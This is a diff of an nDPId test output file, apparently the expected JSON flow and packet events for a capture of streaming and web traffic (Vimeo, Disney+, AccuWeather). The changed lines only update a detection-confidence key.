00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1631088115376,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADQGaj7H6FJtwKgBgAG7toQ\/rdv6Ee1oXqAS\/\/\/HZwAAAgQFTAQCCApg6mr7sy3XKQEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631088115376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0aypAAEAG8xvAqAGAx+hSbbaEAbsR7WheP63b+4AQAfbzyQAAAQEICrMt1zdg6mr7"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} +00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631088115362,"flow_last_seen":1631088115376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1631088115376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":1861,"flow_avg_l4_payload_len":310,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01185{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1631088115362,"flow_last_seen":1631088115392,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":4549,"flow_avg_l4_payload_len":454,"midstream":0,"thread_ts_msec":1631088115392,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"f.vimeocdn.com","server_names":"*.vimeocdn.com","ja3":"cd08e31494f9531f560d64c695473da9","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Atlas R3 DV TLS CA 2020","subjectDN":"CN=*.vimeocdn.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:0F:CF:EC:3C:13:25:E2:E1:4D:C6:52:A6:4D:8D:96:10:1E:8E:37"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":248,"source":"sites.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1623226283573,"flow_last_seen":1623226466507,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":72441,"flow_avg_l4_payload_len":646,"midstream":0,"thread_ts_msec":1631088115406,"l3_proto":"ip4","src_ip":"192.168.1.250","dst_ip":"45.82.241.51","src_port":39890,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Likee","breed":"Fun","category":"SocialNetwork"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":256,"packets-processed":255,"total-skipped-flows":0,"total-l4-payload-len":113664,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":7,"total-updates":0,"current-active-flows":1,"total-active-flows":6,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":50,"global_ts_msec":1637349011376} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1637349011376,"flow_last_seen":1637349011376,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1637349011376,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1637349011376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011376,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8TGJAAEAGkyTAqAGAj8wJQb8WAbs5hVBVAAAAAKAC+vA+\/wAAAgQFtAQCCAoHfmCrAAAAAAEDAww="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1637349011393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1637349011393,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8T5MAAPMGHPOPzAlBwKgBgAG7vxa2dgKJOYVQVqASBZSQpgAAAgQFoAQCCArIQyJ4B35gqwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1637349011393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1637349011393,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0TGNAAEAGkyvAqAGAj8wJQb8WAbs5hVBWtnYCioAQABDE0gAAAQEICgd+YL3IQyJ4"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1637349011376,"flow_last_seen":1637349011396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1637349011396,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":263,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1637349011376,"flow_last_seen":1637349011405,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":243,"midstream":0,"thread_ts_msec":1637349011405,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"prod-static.disney-plus.net","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1631088115362,"flow_last_seen":1631088168165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":224,"midstream":0,"thread_ts_msec":1637349011425,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"199.232.82.109","src_port":46724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Vimeo","breed":"Fun","category":"Streaming"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":285,"packets-processed":284,"total-skipped-flows":0,"total-l4-payload-len":121431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":8,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1642584017659} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642584017659,"flow_last_seen":1642584017659,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642584017659,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":285,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642584017659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017659,"pkt":"CL6sCxdumt9Y+uvcCABFAAA8EtFAAEAG2zrAqAypFwxoU5lQAbvzO0RFAAAAAKAC\/\/9KaQAAAgQFtAQCCApYVYYCAAAAAAEDAwk="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642584017680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642584017680,"pkt":"mt9Y+uvcCL6sCxduCABFAAA8AABAADcG9wsXDGhTwKgMqQG7mVB1nT8a8ztERqAS\/ojzIwAAAgQFtAQCCAqw3vMWWFWGAgEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642584017681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1642584017681,"pkt":"CL6sCxdumt9Y+uvcCABFAAA0EtJAAEAG20HAqAypFwxoU5lQAbvzO0RGdZ0\/G4AQAKwfuAAAAQEIClhVhhew3vMW"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":288,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1642584017659,"flow_last_seen":1642584017683,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1642584017683,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":290,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1642584017659,"flow_last_seen":1642584017706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1642584017706,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"api.accuweather.com","ja3":"9b02ebd3a43b62d825e1ac605b621dc8","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1637349011376,"flow_last_seen":1637349011425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":7767,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1642584019409,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"143.204.9.65","src_port":48918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DisneyPlus","breed":"Fun","category":"Streaming"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":315,"packets-processed":314,"total-skipped-flows":0,"total-l4-payload-len":128021,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":66,"global_ts_msec":1643355518166} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1643355518166,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1292,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1292,"pkt_l4_len":1258,"thread_ts_msec":1643355518166,"pkt":"pJGxgjQ5SKRyNpegCABFAAT+PElAAIARThnAqAF72DrRLubeAbsE6urRwAAAAAEIZ7HskbOWr9QAAETQNKtjIjiCXCI+9vqBWPy31G7jDH4RlwYv0XhaWuj0UrdcSVWZIrVwzwDrJa8dEWOeUvaAw7BXeYev6bi8Nu9Z4LWOvt0+XPgNkeHB6PvaZ9N4cpB1UIRx6byg5QljaxCkgdia5\/WZz2yX\/TayWJG0egLwFK4DYqDDADilA59ewmPTSu6+F3\/EVfKw86o2Yio5HeQqtUOtEdw6pRwxBehgjTrZf0PMuk40XDPug94YB\/sEApD8Ghq1zUUVofn\/jZoji68n+CZ74BkmZ8LSaemosx3Vm7YV3yQUauQU4lBHNM2XdkooJSDGv9YINXu8hmpHdW\/1encLGdPSyOJC8itWve1maDbUaMRhrbQrpaAPeVfgND5alDCN2DMGvFe3nB6Pz2LOpDsj\/3ZN3caT5Nt0nSv8HN+DYWZc+2JmBlBY71FJ57bmTqruFnoZ\/GjM0BGxB5WlpJ0M3zE3M16k0p8WRYGK3bOkXFB5rtEix709VUri+WnB1ivvzP4A8iO977JvKVGlPddOYZ4k7qZne6v\/jb1y0P5AatOM7YYIeRI7u8jf\/xM8RY8UTL\/Pv+EQzBcgac+DyXJSt\/sJo+Uuz0dGCYpa4Aa01DbWUiA5x+j4g5WT5LGdKrytMkGgkIcVSlNAt4nWOQc2IroqJjfmf+NbusGe\/Gviz5jV93bOaTFv7sGyuvESP0iH2MD2mwPgizF6t5EabtXWaevGbit0ev